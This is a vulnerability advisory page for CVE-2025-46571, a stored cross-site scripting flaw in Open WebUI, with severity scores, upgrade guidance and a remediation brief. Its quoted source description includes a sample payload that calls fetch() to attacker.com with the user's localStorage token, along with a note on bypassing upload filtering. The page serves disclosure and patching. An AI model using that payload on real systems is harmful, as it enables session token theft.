Skip to content

← Actionable
Medium, CVSS 6.4amended

Open WebUI allows limited stored XSS vila uploaded html file

CVE-2025-46571GHSA-8gh5-qqh8-hq3x

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (open-webui 0.6.6), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS 4.0
6.4 · CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N · score source
EPSS
  • CVE-2025-46571: 0.37% estimated exploitation activity in the next 30 days; percentile 30.78 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description

As published by the source; long descriptions are shortened.

Summary Low privileged users can upload HTML files which contain JavaScript code via the /api/v1/files/ backend endpoint. This endpoint returns a file id, which can be used to open the file in the browser and trigger the JavaScript code in the user's browser. Under the default settings, files uploaded by low-privileged users can only be viewed by admins or themselves, limiting the impact of this vulnerability. Details The following HTTP request can be sent to the backend server to upload a file with the contents: <scriptfetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script Note the filename="test.html" , Content-Type: text/html, and <h1padding</h in the request's body. These are important because some form of sanitization or filtering was observed which caused errors when uploading an html file that only conained a <script tag. The backend server responds to the above request with JSON data that contains an id parameter. This ID can be used to view the…

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 3 · amended ·

    Amended from ghsa record GHSA-8gh5-qqh8-hq3x

  2. Revision 2 · amended ·

    Reviewed OSV alias/range/CVSS4 correction; package source scopes and original publication preserved. No customer finding resolved.

  3. Revision 1 · created ·

    Published from osv record GHSA-8gh5-qqh8-hq3x

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: CVE-2025-46571

Advisory: Open WebUI allows limited stored XSS vila uploaded html file
IDs: CVE-2025-46571, GHSA-8gh5-qqh8-hq3x
Record: https://patchnext.com/advisories/cve-2025-46571 (revision 3, source checked 26 Oct 2026, 13:46 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: Medium (CVSS 6.4)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: open-webui 0.6.6. A vendor fix does not mean a deployment is fixed.

## Affected components
- PyPI open-webui: affected < 0.6.6; fixed in 0.6.6

## Suggested inspection (read-only)
- `python -m pip show open-webui`: prints the installed version. Run with the environment that serves production active.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on open-webui.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://osv.dev/vulnerability/GHSA-8gh5-qqh8-hq3x (OSV record GHSA-8gh5-qqh8-hq3x lists affected ranges: PyPI open-webui >=0 <0.6.6 (fixed))
- Verified: https://github.com/advisories/GHSA-8gh5-qqh8-hq3x (GitHub-reviewed advisory GHSA-8gh5-qqh8-hq3x lists affected ranges: PyPI open-webui >=0 <0.6.6)

Commands are suggestions: review each one before running it.

Loading voting…